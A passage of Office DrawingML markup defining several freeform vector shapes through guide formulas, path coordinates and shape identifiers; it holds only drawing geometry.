                  <a:gd name="T16" fmla="*/ 39 w 40"/>
                  <a:gd name="T17" fmla="*/ 11 h 90"/>
                  <a:gd name="T18" fmla="*/ 33 w 40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"/>
                  <a:gd name="T31" fmla="*/ 0 h 90"/>
                  <a:gd name="T32" fmla="*/ 40 w 40"/>
                  <a:gd name="T33" fmla="*/ 90 h 9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" h="90">
                    <a:moveTo>
                      <a:pt x="33" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="29" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="1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40000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8" name="Freeform 276">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16AEC2EA-3014-4E16-9910-9CEFD5698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" y="2225"/>
                <a:ext cx="151" cy="150"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 122 w 151"/>
                  <a:gd name="T1" fmla="*/ 7 h 150"/>
                  <a:gd name="T2" fmla="*/ 117 w 151"/>
                  <a:gd name="T3" fmla="*/ 0 h 150"/>
                  <a:gd name="T4" fmla="*/ 81 w 151"/>
                  <a:gd name="T5" fmla="*/ 13 h 150"/>
                  <a:gd name="T6" fmla="*/ 79 w 151"/>
                  <a:gd name="T7" fmla="*/ 24 h 150"/>
                  <a:gd name="T8" fmla="*/ 75 w 151"/>
                  <a:gd name="T9" fmla="*/ 27 h 150"/>
                  <a:gd name="T10" fmla="*/ 71 w 151"/>
                  <a:gd name="T11" fmla="*/ 31 h 150"/>
                  <a:gd name="T12" fmla="*/ 70 w 151"/>
                  <a:gd name="T13" fmla="*/ 38 h 150"/>
                  <a:gd name="T14" fmla="*/ 61 w 151"/>
                  <a:gd name="T15" fmla="*/ 56 h 150"/>
                  <a:gd name="T16" fmla="*/ 55 w 151"/>
                  <a:gd name="T17" fmla="*/ 77 h 150"/>
                  <a:gd name="T18" fmla="*/ 52 w 151"/>
                  <a:gd name="T19" fmla="*/ 90 h 150"/>
                  <a:gd name="T20" fmla="*/ 22 w 151"/>
                  <a:gd name="T21" fmla="*/ 91 h 150"/>
                  <a:gd name="T22" fmla="*/ 17 w 151"/>
                  <a:gd name="T23" fmla="*/ 93 h 150"/>
                  <a:gd name="T24" fmla="*/ 4 w 151"/>
                  <a:gd name="T25" fmla="*/ 93 h 150"/>
                  <a:gd name="T26" fmla="*/ 0 w 151"/>
                  <a:gd name="T27" fmla="*/ 99 h 150"/>
                  <a:gd name="T28" fmla="*/ 0 w 151"/>
                  <a:gd name="T29" fmla="*/ 105 h 150"/>
                  <a:gd name="T30" fmla="*/ 0 w 151"/>
                  <a:gd name="T31" fmla="*/ 110 h 150"/>
                  <a:gd name="T32" fmla="*/ 14 w 151"/>
                  <a:gd name="T33" fmla="*/ 112 h 150"/>
                  <a:gd name="T34" fmla="*/ 19 w 151"/>
                  <a:gd name="T35" fmla="*/ 121 h 150"/>
                  <a:gd name="T36" fmla="*/ 31 w 151"/>
                  <a:gd name="T37" fmla="*/ 123 h 150"/>
                  <a:gd name="T38" fmla="*/ 39 w 151"/>
                  <a:gd name="T39" fmla="*/ 123 h 150"/>
                  <a:gd name="T40" fmla="*/ 49 w 151"/>
                  <a:gd name="T41" fmla="*/ 125 h 150"/>
                  <a:gd name="T42" fmla="*/ 50 w 151"/>
                  <a:gd name="T43" fmla="*/ 128 h 150"/>
                  <a:gd name="T44" fmla="*/ 49 w 151"/>
                  <a:gd name="T45" fmla="*/ 135 h 150"/>
                  <a:gd name="T46" fmla="*/ 51 w 151"/>
                  <a:gd name="T47" fmla="*/ 141 h 150"/>
                  <a:gd name="T48" fmla="*/ 56 w 151"/>
                  <a:gd name="T49" fmla="*/ 142 h 150"/>
                  <a:gd name="T50" fmla="*/ 63 w 151"/>
                  <a:gd name="T51" fmla="*/ 144 h 150"/>
                  <a:gd name="T52" fmla="*/ 70 w 151"/>
                  <a:gd name="T53" fmla="*/ 149 h 150"/>
                  <a:gd name="T54" fmla="*/ 77 w 151"/>
                  <a:gd name="T55" fmla="*/ 149 h 150"/>
                  <a:gd name="T56" fmla="*/ 84 w 151"/>
                  <a:gd name="T57" fmla="*/ 148 h 150"/>
                  <a:gd name="T58" fmla="*/ 94 w 151"/>
                  <a:gd name="T59" fmla="*/ 145 h 150"/>
                  <a:gd name="T60" fmla="*/ 106 w 151"/>
                  <a:gd name="T61" fmla="*/ 146 h 150"/>
                  <a:gd name="T62" fmla="*/ 118 w 151"/>
                  <a:gd name="T63" fmla="*/ 149 h 150"/>
                  <a:gd name="T64" fmla="*/ 130 w 151"/>
                  <a:gd name="T65" fmla="*/ 146 h 150"/>
                  <a:gd name="T66" fmla="*/ 137 w 151"/>
                  <a:gd name="T67" fmla="*/ 138 h 150"/>
                  <a:gd name="T68" fmla="*/ 136 w 151"/>
                  <a:gd name="T69" fmla="*/ 131 h 150"/>
                  <a:gd name="T70" fmla="*/ 140 w 151"/>
                  <a:gd name="T71" fmla="*/ 120 h 150"/>
                  <a:gd name="T72" fmla="*/ 141 w 151"/>
                  <a:gd name="T73" fmla="*/ 106 h 150"/>
                  <a:gd name="T74" fmla="*/ 145 w 151"/>
                  <a:gd name="T75" fmla="*/ 94 h 150"/>
                  <a:gd name="T76" fmla="*/ 150 w 151"/>
                  <a:gd name="T77" fmla="*/ 75 h 150"/>
                  <a:gd name="T78" fmla="*/ 149 w 151"/>
                  <a:gd name="T79" fmla="*/ 56 h 150"/>
                  <a:gd name="T80" fmla="*/ 149 w 151"/>
                  <a:gd name="T81" fmla="*/ 39 h 150"/>
                  <a:gd name="T82" fmla="*/ 148 w 151"/>
                  <a:gd name="T83" fmla="*/ 27 h 150"/>
                  <a:gd name="T84" fmla="*/ 145 w 151"/>
                  <a:gd name="T85" fmla="*/ 23 h 150"/>
                  <a:gd name="T86" fmla="*/ 139 w 151"/>
                  <a:gd name="T87" fmla="*/ 18 h 150"/>
                  <a:gd name="T88" fmla="*/ 130 w 151"/>
                  <a:gd name="T89" fmla="*/ 12 h 150"/>
                  <a:gd name="T90" fmla="*/ 122 w 151"/>
                  <a:gd name="T91" fmla="*/ 7 h 1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1"/>
                  <a:gd name="T139" fmla="*/ 0 h 150"/>
                  <a:gd name="T140" fmla="*/ 151 w 151"/>
                  <a:gd name="T141" fmla="*/ 150 h 1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1" h="150">
                    <a:moveTo>
                      <a:pt x="122" y="7"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="117" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="120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0" y="75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48" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="7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59" name="Freeform 277">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C88BD851-AC2C-4B78-AF31-17973A1A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" y="2234"/>
                <a:ext cx="93" cy="136"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 12 w 93"/>
                  <a:gd name="T1" fmla="*/ 111 h 136"/>
                  <a:gd name="T2" fmla="*/ 33 w 93"/>
                  <a:gd name="T3" fmla="*/ 110 h 136"/>
                  <a:gd name="T4" fmla="*/ 52 w 93"/>
                  <a:gd name="T5" fmla="*/ 104 h 136"/>
                  <a:gd name="T6" fmla="*/ 58 w 93"/>
                  <a:gd name="T7" fmla="*/ 92 h 136"/>
                  <a:gd name="T8" fmla="*/ 57 w 93"/>
                  <a:gd name="T9" fmla="*/ 84 h 136"/>
                  <a:gd name="T10" fmla="*/ 71 w 93"/>
                  <a:gd name="T11" fmla="*/ 68 h 136"/>
                  <a:gd name="T12" fmla="*/ 57 w 93"/>
                  <a:gd name="T13" fmla="*/ 75 h 136"/>
                  <a:gd name="T14" fmla="*/ 65 w 93"/>
                  <a:gd name="T15" fmla="*/ 59 h 136"/>
                  <a:gd name="T16" fmla="*/ 77 w 93"/>
                  <a:gd name="T17" fmla="*/ 39 h 136"/>
                  <a:gd name="T18" fmla="*/ 58 w 93"/>
                  <a:gd name="T19" fmla="*/ 57 h 136"/>
                  <a:gd name="T20" fmla="*/ 57 w 93"/>
                  <a:gd name="T21" fmla="*/ 30 h 136"/>
                  <a:gd name="T22" fmla="*/ 48 w 93"/>
                  <a:gd name="T23" fmla="*/ 21 h 136"/>
                  <a:gd name="T24" fmla="*/ 36 w 93"/>
                  <a:gd name="T25" fmla="*/ 17 h 136"/>
                  <a:gd name="T26" fmla="*/ 59 w 93"/>
                  <a:gd name="T27" fmla="*/ 10 h 136"/>
                  <a:gd name="T28" fmla="*/ 70 w 93"/>
                  <a:gd name="T29" fmla="*/ 17 h 136"/>
                  <a:gd name="T30" fmla="*/ 63 w 93"/>
                  <a:gd name="T31" fmla="*/ 10 h 136"/>
                  <a:gd name="T32" fmla="*/ 50 w 93"/>
                  <a:gd name="T33" fmla="*/ 6 h 136"/>
                  <a:gd name="T34" fmla="*/ 59 w 93"/>
                  <a:gd name="T35" fmla="*/ 3 h 136"/>
                  <a:gd name="T36" fmla="*/ 67 w 93"/>
                  <a:gd name="T37" fmla="*/ 0 h 136"/>
                  <a:gd name="T38" fmla="*/ 78 w 93"/>
                  <a:gd name="T39" fmla="*/ 7 h 136"/>
                  <a:gd name="T40" fmla="*/ 88 w 93"/>
                  <a:gd name="T41" fmla="*/ 15 h 136"/>
                  <a:gd name="T42" fmla="*/ 92 w 93"/>
                  <a:gd name="T43" fmla="*/ 26 h 136"/>
                  <a:gd name="T44" fmla="*/ 91 w 93"/>
                  <a:gd name="T45" fmla="*/ 50 h 136"/>
                  <a:gd name="T46" fmla="*/ 88 w 93"/>
                  <a:gd name="T47" fmla="*/ 78 h 136"/>
                  <a:gd name="T48" fmla="*/ 82 w 93"/>
                  <a:gd name="T49" fmla="*/ 106 h 136"/>
                  <a:gd name="T50" fmla="*/ 80 w 93"/>
                  <a:gd name="T51" fmla="*/ 123 h 136"/>
                  <a:gd name="T52" fmla="*/ 75 w 93"/>
                  <a:gd name="T53" fmla="*/ 131 h 136"/>
                  <a:gd name="T54" fmla="*/ 63 w 93"/>
                  <a:gd name="T55" fmla="*/ 135 h 136"/>
                  <a:gd name="T56" fmla="*/ 55 w 93"/>
                  <a:gd name="T57" fmla="*/ 132 h 136"/>
                  <a:gd name="T58" fmla="*/ 48 w 93"/>
                  <a:gd name="T59" fmla="*/ 126 h 136"/>
                  <a:gd name="T60" fmla="*/ 46 w 93"/>
                  <a:gd name="T61" fmla="*/ 123 h 136"/>
                  <a:gd name="T62" fmla="*/ 36 w 93"/>
                  <a:gd name="T63" fmla="*/ 131 h 136"/>
                  <a:gd name="T64" fmla="*/ 25 w 93"/>
                  <a:gd name="T65" fmla="*/ 133 h 136"/>
                  <a:gd name="T66" fmla="*/ 15 w 93"/>
                  <a:gd name="T67" fmla="*/ 132 h 136"/>
                  <a:gd name="T68" fmla="*/ 21 w 93"/>
                  <a:gd name="T69" fmla="*/ 126 h 136"/>
                  <a:gd name="T70" fmla="*/ 32 w 93"/>
                  <a:gd name="T71" fmla="*/ 117 h 136"/>
                  <a:gd name="T72" fmla="*/ 15 w 93"/>
                  <a:gd name="T73" fmla="*/ 124 h 136"/>
                  <a:gd name="T74" fmla="*/ 3 w 93"/>
                  <a:gd name="T75" fmla="*/ 128 h 136"/>
                  <a:gd name="T76" fmla="*/ 0 w 93"/>
                  <a:gd name="T77" fmla="*/ 123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3"/>
                  <a:gd name="T118" fmla="*/ 0 h 136"/>
                  <a:gd name="T119" fmla="*/ 93 w 93"/>
                  <a:gd name="T120" fmla="*/ 136 h 1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3" h="136">
                    <a:moveTo>
                      <a:pt x="0" y="112"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="12" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="112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0" name="Freeform 278">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70D176D9-C631-4830-9B05-039133091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8" y="2304"/>
                <a:ext cx="27" cy="61"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 27"/>
                  <a:gd name="T1" fmla="*/ 60 h 61"/>
                  <a:gd name="T2" fmla="*/ 5 w 27"/>
                  <a:gd name="T3" fmla="*/ 57 h 61"/>
                  <a:gd name="T4" fmla="*/ 9 w 27"/>
                  <a:gd name="T5" fmla="*/ 53 h 61"/>
                  <a:gd name="T6" fmla="*/ 13 w 27"/>
                  <a:gd name="T7" fmla="*/ 45 h 61"/>
                  <a:gd name="T8" fmla="*/ 15 w 27"/>
                  <a:gd name="T9" fmla="*/ 37 h 61"/>
                  <a:gd name="T10" fmla="*/ 20 w 27"/>
                  <a:gd name="T11" fmla="*/ 28 h 61"/>
                  <a:gd name="T12" fmla="*/ 20 w 27"/>
                  <a:gd name="T13" fmla="*/ 20 h 61"/>
                  <a:gd name="T14" fmla="*/ 23 w 27"/>
                  <a:gd name="T15" fmla="*/ 8 h 61"/>
                  <a:gd name="T16" fmla="*/ 26 w 27"/>
                  <a:gd name="T17" fmla="*/ 0 h 61"/>
                  <a:gd name="T18" fmla="*/ 20 w 27"/>
                  <a:gd name="T19" fmla="*/ 17 h 61"/>
                  <a:gd name="T20" fmla="*/ 15 w 27"/>
                  <a:gd name="T21" fmla="*/ 31 h 61"/>
                  <a:gd name="T22" fmla="*/ 10 w 27"/>
                  <a:gd name="T23" fmla="*/ 40 h 61"/>
                  <a:gd name="T24" fmla="*/ 3 w 27"/>
                  <a:gd name="T25" fmla="*/ 50 h 61"/>
                  <a:gd name="T26" fmla="*/ 0 w 27"/>
                  <a:gd name="T27" fmla="*/ 60 h 6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7"/>
                  <a:gd name="T43" fmla="*/ 0 h 61"/>
                  <a:gd name="T44" fmla="*/ 27 w 27"/>
                  <a:gd name="T45" fmla="*/ 61 h 6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7" h="61">
                    <a:moveTo>
                      <a:pt x="0" y="60"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="5" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="50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1" name="Freeform 279">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3652D757-19A5-4F76-9A8D-C9D72451F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7" y="2251"/>
                <a:ext cx="108" cy="96"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 74 w 108"/>
                  <a:gd name="T1" fmla="*/ 3 h 96"/>
                  <a:gd name="T2" fmla="*/ 65 w 108"/>
                  <a:gd name="T3" fmla="*/ 18 h 96"/>
                  <a:gd name="T4" fmla="*/ 67 w 108"/>
                  <a:gd name="T5" fmla="*/ 31 h 96"/>
                  <a:gd name="T6" fmla="*/ 66 w 108"/>
                  <a:gd name="T7" fmla="*/ 47 h 96"/>
                  <a:gd name="T8" fmla="*/ 66 w 108"/>
                  <a:gd name="T9" fmla="*/ 50 h 96"/>
                  <a:gd name="T10" fmla="*/ 67 w 108"/>
                  <a:gd name="T11" fmla="*/ 55 h 96"/>
                  <a:gd name="T12" fmla="*/ 63 w 108"/>
                  <a:gd name="T13" fmla="*/ 59 h 96"/>
                  <a:gd name="T14" fmla="*/ 58 w 108"/>
                  <a:gd name="T15" fmla="*/ 63 h 96"/>
                  <a:gd name="T16" fmla="*/ 52 w 108"/>
                  <a:gd name="T17" fmla="*/ 63 h 96"/>
                  <a:gd name="T18" fmla="*/ 27 w 108"/>
                  <a:gd name="T19" fmla="*/ 65 h 96"/>
                  <a:gd name="T20" fmla="*/ 15 w 108"/>
                  <a:gd name="T21" fmla="*/ 67 h 96"/>
                  <a:gd name="T22" fmla="*/ 0 w 108"/>
                  <a:gd name="T23" fmla="*/ 71 h 96"/>
                  <a:gd name="T24" fmla="*/ 0 w 108"/>
                  <a:gd name="T25" fmla="*/ 81 h 96"/>
                  <a:gd name="T26" fmla="*/ 9 w 108"/>
                  <a:gd name="T27" fmla="*/ 79 h 96"/>
                  <a:gd name="T28" fmla="*/ 12 w 108"/>
                  <a:gd name="T29" fmla="*/ 74 h 96"/>
                  <a:gd name="T30" fmla="*/ 14 w 108"/>
                  <a:gd name="T31" fmla="*/ 84 h 96"/>
                  <a:gd name="T32" fmla="*/ 19 w 108"/>
                  <a:gd name="T33" fmla="*/ 91 h 96"/>
                  <a:gd name="T34" fmla="*/ 36 w 108"/>
                  <a:gd name="T35" fmla="*/ 95 h 96"/>
                  <a:gd name="T36" fmla="*/ 34 w 108"/>
                  <a:gd name="T37" fmla="*/ 90 h 96"/>
                  <a:gd name="T38" fmla="*/ 25 w 108"/>
                  <a:gd name="T39" fmla="*/ 79 h 96"/>
                  <a:gd name="T40" fmla="*/ 33 w 108"/>
                  <a:gd name="T41" fmla="*/ 76 h 96"/>
                  <a:gd name="T42" fmla="*/ 36 w 108"/>
                  <a:gd name="T43" fmla="*/ 84 h 96"/>
                  <a:gd name="T44" fmla="*/ 48 w 108"/>
                  <a:gd name="T45" fmla="*/ 94 h 96"/>
                  <a:gd name="T46" fmla="*/ 64 w 108"/>
                  <a:gd name="T47" fmla="*/ 94 h 96"/>
                  <a:gd name="T48" fmla="*/ 47 w 108"/>
                  <a:gd name="T49" fmla="*/ 83 h 96"/>
                  <a:gd name="T50" fmla="*/ 39 w 108"/>
                  <a:gd name="T51" fmla="*/ 76 h 96"/>
                  <a:gd name="T52" fmla="*/ 44 w 108"/>
                  <a:gd name="T53" fmla="*/ 72 h 96"/>
                  <a:gd name="T54" fmla="*/ 50 w 108"/>
                  <a:gd name="T55" fmla="*/ 79 h 96"/>
                  <a:gd name="T56" fmla="*/ 61 w 108"/>
                  <a:gd name="T57" fmla="*/ 87 h 96"/>
                  <a:gd name="T58" fmla="*/ 71 w 108"/>
                  <a:gd name="T59" fmla="*/ 92 h 96"/>
                  <a:gd name="T60" fmla="*/ 83 w 108"/>
                  <a:gd name="T61" fmla="*/ 92 h 96"/>
                  <a:gd name="T62" fmla="*/ 76 w 108"/>
                  <a:gd name="T63" fmla="*/ 87 h 96"/>
                  <a:gd name="T64" fmla="*/ 66 w 108"/>
                  <a:gd name="T65" fmla="*/ 79 h 96"/>
                  <a:gd name="T66" fmla="*/ 68 w 108"/>
                  <a:gd name="T67" fmla="*/ 76 h 96"/>
                  <a:gd name="T68" fmla="*/ 73 w 108"/>
                  <a:gd name="T69" fmla="*/ 82 h 96"/>
                  <a:gd name="T70" fmla="*/ 83 w 108"/>
                  <a:gd name="T71" fmla="*/ 89 h 96"/>
                  <a:gd name="T72" fmla="*/ 95 w 108"/>
                  <a:gd name="T73" fmla="*/ 90 h 96"/>
                  <a:gd name="T74" fmla="*/ 102 w 108"/>
                  <a:gd name="T75" fmla="*/ 81 h 96"/>
                  <a:gd name="T76" fmla="*/ 80 w 108"/>
                  <a:gd name="T77" fmla="*/ 78 h 96"/>
                  <a:gd name="T78" fmla="*/ 66 w 108"/>
                  <a:gd name="T79" fmla="*/ 71 h 96"/>
                  <a:gd name="T80" fmla="*/ 64 w 108"/>
                  <a:gd name="T81" fmla="*/ 65 h 96"/>
